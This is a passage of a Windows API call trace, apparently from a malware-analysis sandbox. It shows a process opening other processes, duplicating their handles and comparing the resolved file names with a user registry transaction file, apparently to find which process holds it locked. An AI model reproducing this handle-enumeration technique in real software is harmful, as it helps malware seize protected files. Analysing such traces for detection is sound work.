DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.675] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.675] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.675] CloseHandle (hObject=0x670) returned 1 [0153.675] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.675] CloseHandle (hObject=0x680) returned 1 [0153.675] CloseHandle (hObject=0x62c) returned 1 [0153.675] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.675] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x620, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.676] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.677] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.677] CloseHandle (hObject=0x670) returned 1 [0153.677] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.677] CloseHandle (hObject=0x680) returned 1 [0153.677] CloseHandle (hObject=0x62c) returned 1 [0153.677] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.677] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.678] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.678] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.679] CloseHandle (hObject=0x670) returned 1 [0153.679] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.679] CloseHandle (hObject=0x680) returned 1 [0153.679] CloseHandle (hObject=0x62c) returned 1 [0153.679] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.679] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.680] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.680] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.680] CloseHandle (hObject=0x670) returned 1 [0153.680] CloseHandle (hObject=0x680) returned 1 [0153.680] CloseHandle (hObject=0x62c) returned 1 [0153.681] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.681] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x638, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.681] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.682] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.682] CloseHandle (hObject=0x670) returned 1 [0153.682] CloseHandle (hObject=0x680) returned 1 [0153.682] CloseHandle (hObject=0x62c) returned 1 [0153.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.682] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x690, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.682] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.683] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.683] CloseHandle (hObject=0x670) returned 1 [0153.683] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.683] CloseHandle (hObject=0x680) returned 1 [0153.683] CloseHandle (hObject=0x62c) returned 1 [0153.683] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.683] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.684] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.685] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.685] CloseHandle (hObject=0x670) returned 1 [0153.685] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.685] CloseHandle (hObject=0x680) returned 1 [0153.685] CloseHandle (hObject=0x62c) returned 1 [0153.685] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.685] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.686] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.686] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.686] CloseHandle (hObject=0x670) returned 1 [0153.686] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.686] CloseHandle (hObject=0x680) returned 1 [0153.686] CloseHandle (hObject=0x62c) returned 1 [0153.686] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.686] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.687] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.687] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.688] CloseHandle (hObject=0x670) returned 1 [0153.688] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.688] CloseHandle (hObject=0x680) returned 1 [0153.688] CloseHandle (hObject=0x62c) returned 1 [0153.688] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.688] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x748, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.688] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.688] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.689] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.689] CloseHandle (hObject=0x670) returned 1 [0153.689] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.689] CloseHandle (hObject=0x680) returned 1 [0153.689] CloseHandle (hObject=0x62c) returned 1 [0153.689] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.689] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x754, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.690] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.690] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.691] CloseHandle (hObject=0x670) returned 1 [0153.691] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.691] CloseHandle (hObject=0x680) returned 1 [0153.691] CloseHandle (hObject=0x62c) returned 1 [0153.691] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.691] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.692] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.692] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.692] CloseHandle (hObject=0x670) returned 1 [0153.692] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.692] CloseHandle (hObject=0x680) returned 1 [0153.693] CloseHandle (hObject=0x62c) returned 1 [0153.693] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.693] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.693] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.693] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.694] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.695] CloseHandle (hObject=0x670) returned 1 [0153.695] CloseHandle (hObject=0x680) returned 1 [0153.695] CloseHandle (hObject=0x62c) returned 1 [0153.695] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.695] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.695] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.696] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.696] CloseHandle (hObject=0x670) returned 1 [0153.696] CloseHandle (hObject=0x680) returned 1 [0153.696] CloseHandle (hObject=0x62c) returned 1 [0153.696] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.696] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.697] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.697] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.697] CloseHandle (hObject=0x670) returned 1 [0153.697] CloseHandle (hObject=0x680) returned 1 [0153.697] CloseHandle (hObject=0x62c) returned 1 [0153.698] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.698] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.698] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.699] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.699] CloseHandle (hObject=0x670) returned 1 [0153.699] CloseHandle (hObject=0x680) returned 1 [0153.699] CloseHandle (hObject=0x62c) returned 1 [0153.699] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.699] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.700] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.701] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.701] CloseHandle (hObject=0x670) returned 1 [0153.701] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -64 [0153.701] CloseHandle (hObject=0x680) returned 1 [0153.701] CloseHandle (hObject=0x62c) returned 1 [0153.701] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.701] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.702] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.702] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.702] CloseHandle (hObject=0x670) returned 1 [0153.702] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.702] CloseHandle (hObject=0x680) returned 1 [0153.702] CloseHandle (hObject=0x62c) returned 1 [0153.702] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.702] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.703] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.704] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.704] CloseHandle (hObject=0x670) returned 1 [0153.704] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -74 [0153.704] CloseHandle (hObject=0x680) returned 1 [0153.704] CloseHandle (hObject=0x62c) returned 1 [0153.704] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.704] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.705] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.706] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.706] CloseHandle (hObject=0x670) returned 1 [0153.706] CloseHandle (hObject=0x680) returned 1 [0153.706] CloseHandle (hObject=0x62c) returned 1 [0153.706] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.706] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.707] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.708] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.708] CloseHandle (hObject=0x670) returned 1 [0153.708] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.708] CloseHandle (hObject=0x680) returned 1 [0153.708] CloseHandle (hObject=0x62c) returned 1 [0153.708] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.708] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.708] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.708] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.709] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.709] CloseHandle (hObject=0x670) returned 1 [0153.709] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.709] CloseHandle (hObject=0x680) returned 1 [0153.709] CloseHandle (hObject=0x62c) returned 1 [0153.709] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.709] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.710] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.711] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.711] CloseHandle (hObject=0x670) returned 1 [0153.711] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.711] CloseHandle (hObject=0x680) returned 1 [0153.711] CloseHandle (hObject=0x62c) returned 1 [0153.711] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.711] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.712] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.712] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.713] CloseHandle (hObject=0x670) returned 1 [0153.713] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.713] CloseHandle (hObject=0x680) returned 1 [0153.713] CloseHandle (hObject=0x62c) returned 1 [0153.713] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.713] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.713] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.714] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.714] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.714] CloseHandle (hObject=0x670) returned 1 [0153.714] CloseHandle (hObject=0x680) returned 1 [0153.714] CloseHandle (hObject=0x62c) returned 1 [0153.714] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.714] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.715] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.716] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.716] CloseHandle (hObject=0x670) returned 1 [0153.716] CloseHandle (hObject=0x680) returned 1 [0153.716] CloseHandle (hObject=0x62c) returned 1 [0153.716] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.716] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | 